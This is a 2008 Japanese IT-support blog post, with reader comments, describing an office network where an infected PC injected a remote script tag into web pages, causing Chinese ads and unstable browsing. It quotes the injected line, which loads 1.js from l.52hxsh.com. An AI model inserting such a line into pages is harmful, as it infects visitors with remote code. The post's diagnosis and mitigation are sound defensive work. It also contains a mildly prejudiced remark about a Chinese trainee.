- 2008-03-02 (日) 20:15
- サポート録
表題の件で訪問依頼。
ああ、なんかのアドウェアにかかったかと見に行ったのだが、今回はちょっと違った。
なんと社内の殆どすべてのPCで同時発生したというのだ。
確認すると、不定期に中国語の広告が表示されている。
ペンギンのマスコットで有名なQQというサイトの広告だ。
夜勤中の中国人実習生が会社の端末で勝手にインターネットをしていたら、翌朝から症状が出始めたとのことだった。
ルータのログを除いていると、定期的にqq.comと52hxsh.comへアクセスした履歴がある。
が、ルータはNTT WebCaster710
こいつのログは100件程度しかたまらないらしく、あまり参考にならない。
とりあえず上記のURL2つをフィルタして確認すると、広告は表示されなくなった。
それぞれのマシンでマルウェアをスキャンしてみたが、全く引っ掛からない。
しかし、ネットの接続が妙に不安定だ。
頻繁に「サイトが表示できません」とエラーが出て、リロードすると表示される。
担当者に話を聞くと、これも広告が出始めてからの症状だという。
ここでなんとなく読めてきた。
症状が出る時には以下のスクリプトがソースのトップに追記されている。
<script src=”http:://l.52hxsh.com/1.js”></script>
いやびっくり。
初めて見ました。
ウイルスに感染したPCがプロクシの役割をし、htmlをクライアントに渡す際にスクリプトを追記しているようなのです。
問題のPCをネットワークから外せば全く問題なく動き始めました。
今回のケースは、中国人実習生が勝手にPCに触ったことがことの起こり。
触ってはいけないと伝えるのは勿論、話して分かる人間ばかりじゃないため、パスワードロックなどの対策は必要だ。
3月3日追記
<script src=”http:://l.52hxsh.com/1.js”>でGoogle検索したところ、現時点でヒットする文献は中国語サイト3件のみ
この症状または52hxsh.comについて何らかの情報を持っている方はぜひ教えてください。
問題の感染したPCをチェックしようと、 Safemodeで起動しようとするとブルースクリーンでストップ。
通常起動だと普通に起動する。(不安定で細かいチェックは難しい)
システムの一部が改変されているのだろうか?
Comments:2
- チェリー 08-03-10 (月) 20:42
-
会社で同じような事件が発生しました。
質問ですが、この広告をクリックしてしまった場合
ウィルスに感染してしまう可能性はあるんでしょうか?QQ自体は怪しいものじゃないはずなのですが・・・
- 田中達也 08-03-11 (火) 11:35
-
残念ながらリンク先の広告は検証しておらず、なんとも言えません。
本日公開した【その2】に書きましたが、ウイルススキャンの結果、実行ファイル感染型のもののようですので、ネットワークを通じてアクセスできるexeファイルには感染活動を行うかもしれません。
そしてそれを実行してしまったPCは当然感染しますね。
現状ではまだ正体がはっきりしないので、有効な手が打てていません。
安全と思われるPCのみネットワークに復帰させている状況です。
Trackback+Pingback:0
- TrackBack URL for this entry
- http://blog.add-in.co.jp/blog/archives/29/trackback
- Listed below are links to weblogs that reference
- ブラウザの右下隅に時々中国語の広告が表示される from ADD-inのこんなんできるんですか?